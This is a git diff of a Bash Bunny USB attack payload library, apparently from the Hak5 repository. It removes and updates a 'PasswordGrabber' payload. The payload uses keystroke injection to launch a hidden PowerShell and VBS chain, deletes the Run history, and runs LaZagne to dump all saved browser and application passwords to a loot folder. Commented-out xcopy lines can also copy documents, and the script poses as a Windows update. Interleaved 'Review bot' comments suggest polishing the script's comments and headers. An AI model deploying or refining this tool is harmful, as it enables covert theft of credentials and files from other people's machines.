diff --git a/payloads/library/PasswordGrabber/d.cmd b/payloads/library/PasswordGrabber/d.cmd
deleted file mode 100644
index 604ef639..00000000
--- a/payloads/library/PasswordGrabber/d.cmd
+++ /dev/null
@@ -1,4 +0,0 @@
-@echo off
-start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
-cscript %~dp0\i.vbs %~dp0\e.cmd
-@exit
\ No newline at end of file
diff --git a/payloads/library/PasswordGrabber/e.cmd b/payloads/library/PasswordGrabber/e.cmd
deleted file mode 100644
index 5f8d8d89..00000000
--- a/payloads/library/PasswordGrabber/e.cmd
+++ /dev/null
@@ -1,38 +0,0 @@
-@echo off
-@echo Installing Windows Update
-
-REM Delete registry keys storing Run dialog history
-REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
-
-REM Creates directory compromised of computer name, date and time
-REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
-
-REM This executes LaZagne in the current directory and outputs the password file to Loot
-REM Time and Date is also added
-setlocal
-cd /d %~dp0
-%~dp0\laZagne.exe all > %~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt
-
-REM These lines if you just want Passwords and no files.
-set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
-mkdir %dst% >>nul
-
-if Exist %USERPROFILE%\Documents (
-REM /C Continues copying even if errors occur.
-REM /Q Does not display file names while copying.
-REM /G Allows the copying of encrypted files to destination that does not support encryption.
-REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
-REM /E Copies directories and subdirectories, including empty ones.
-
-REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
-
-REM Same as above but does not create empty directories
-REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
-
-)
-
-REM Blink CAPSLOCK key
-start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
-
-@cls
-@exit
diff --git a/payloads/library/PasswordGrabber/i.vbs b/payloads/library/PasswordGrabber/i.vbs
deleted file mode 100644
index 1ffd3c3e..00000000
--- a/payloads/library/PasswordGrabber/i.vbs
+++ /dev/null
@@ -1 +0,0 @@
-CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
diff --git a/payloads/library/PasswordGrabber/payload.txt b/payloads/library/PasswordGrabber/payload.txt
deleted file mode 100644
index 44a01065..00000000
--- a/payloads/library/PasswordGrabber/payload.txt
+++ /dev/null
@@ -1,19 +0,0 @@
-#!/bin/bash
-#
-# Title: USB Exfiltrator
-# Author: Hak5Darren
-# Version: 1.1
-# Target: Windows XP SP3+
-# Props: Diggster, IMcPwn
-# Category: Exfiltration
-#
-# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
-# which in turn executes e.cmd invisibly using i.vbs
-# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
-#
-
-LED ATTACK
-ATTACKMODE HID STORAGE
-DUCKY_LANG se
-RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
-LED FINISH
diff --git a/payloads/library/PasswordGrabber/readme.md b/payloads/library/PasswordGrabber/readme.md
deleted file mode 100644
index b9f0efb8..00000000
--- a/payloads/library/PasswordGrabber/readme.md
+++ /dev/null
@@ -1,32 +0,0 @@
-# PasswordGrabber
-
-* Author: RazerBlade
-* Creds: Hak5Darren, AlessandroZ
-* Version: Version 1.1
-* Firmware support: 1.1
-* Target: Windows
-
-## Description
-
-Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
-This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
-Full read here: https://github.com/AlessandroZ/LaZagne
-
-
-## Configuration
-By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
-I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy
-
-Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne
-When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go!
-
-## STATUS
-
-| LED | Status |
-| ------------------ | -------------------------------------------- |
-| Red | Attack Setup |
-| Green | Attack Complete |
-
-## Discussion
-[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/
-
diff --git a/payloads/library/credentials/PasswordGrabber/e.cmd b/payloads/library/credentials/PasswordGrabber/e.cmd
index b8e4d40f..5f8d8d89 100644
--- a/payloads/library/credentials/PasswordGrabber/e.cmd
+++ b/payloads/library/credentials/PasswordGrabber/e.cmd
@@ -7,10 +7,13 @@ REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious +REM This executes LaZagne in the current directory and outputs the password file to Loot +REM Time and Date is also added setlocal cd /d %~dp0 -%~dp0\laZagne.exe all > %~dp0\..\..\loot\passwords.txt +%~dp0\laZagne.exe all > %~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt +REM These lines if you just want Passwords and no files. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul diff --git a/payloads/library/credentials/PasswordGrabber/laZagne.exe b/payloads/library/credentials/PasswordGrabber/laZagne.exe deleted file mode 100644 index 84724d07..00000000 Binary files a/payloads/library/credentials/PasswordGrabber/laZagne.exe and /dev/null differ diff --git a/payloads/library/credentials/PasswordGrabber/payload.txt b/payloads/library/credentials/PasswordGrabber/payload.txt index 3dd70e68..44a01065 100644 --- a/payloads/library/credentials/PasswordGrabber/payload.txt +++ b/payloads/library/credentials/PasswordGrabber/payload.txt 
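Review bot: The comments around the changed `laZagne.exe` line no longer match the commands they sit next to. `REM Creates directory compromised of computer name, date and time` remains above the two new LaZagne comments, although it describes the `set dst`/`mkdir` pair further down. The added `REM These lines if you just want Passwords and no files.` sits directly above that pair, which as far as this hunk shows runs unconditionally rather than being optional. I would move the directory comment down to `set dst`, reword it along the lines of `REM Create the per-host loot directory (computer name, date, time); the xcopy lines below stay commented out unless file copy is wanted`, and correct "compromised" to "comprised". The script continues past the end of this hunk.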
@@ -1,24 +1,19 @@ #!/bin/bash # -# Title: USB Exfiltration +# Title: USB Exfiltrator # Author: Hak5Darren -# Version: 1.0 +# Version: 1.1 # Target: Windows XP SP3+ # Props: Diggster, IMcPwn +# Category: Exfiltration # # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn executes e.cmd invisibly using i.vbs -# which in turn copies documents to the loot folder on the Bash Bunny. +# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny. # -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh - -LED R +LED ATTACK ATTACKMODE HID STORAGE -QUACK SET_LANGUAGE se -QUACK GUI r -QUACK DELAY 100 -QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" -QUACK ENTER -LED G +DUCKY_LANG se +RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" +LED FINISH diff --git a/payloads/library/credentials/PasswordGrabber/readme.md b/payloads/library/credentials/PasswordGrabber/readme.md index 48605c9f..b9f0efb8 100644 --- a/payloads/library/credentials/PasswordGrabber/readme.md +++ b/payloads/library/credentials/PasswordGrabber/readme.md @@ -2,7 +2,8 @@ * Author: RazerBlade * Creds: Hak5Darren, AlessandroZ -* Version: Version 1.0 +* Version: Version 1.1 +* Firmware support: 1.1 * Target: Windows ## Description 
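Review bot: The header block in the payload.txt hunk still describes a different payload from the one in this directory. It is titled `USB Exfiltrator` with author Hak5Darren and the new `# Category: Exfiltration`, while the file sits under `credentials/PasswordGrabber` and the readme in the same commit names RazerBlade as author. The reworded line `# which in turn executes and if stated, copies documents ...` also leaves out what is executed. I would align the header with the readme, e.g. `# Title: PasswordGrabber`, a category matching the directory (presumably `Credentials`), and `# which in turn runs laZagne.exe and, if the xcopy lines are enabled, copies documents to the loot folder on the Bash Bunny.`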
@@ -16,7 +17,8 @@ Full read here: https://github.com/AlessandroZ/LaZagne By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy -If you are afraid of .exe you can compile your self from his github: https://github.com/AlessandroZ/LaZagne +Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne +When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go! ## STATUS @@ -26,8 +28,5 @@ If you are afraid of .exe you can compile your self from his github: https://git | Green | Attack Complete | ## Discussion -[Hak5 Forum Thread]("https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/") +[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/ -## Future Work - -I will try to add mac support and also make the password file appear in the loot folder that [usb_exfiltrator] creates.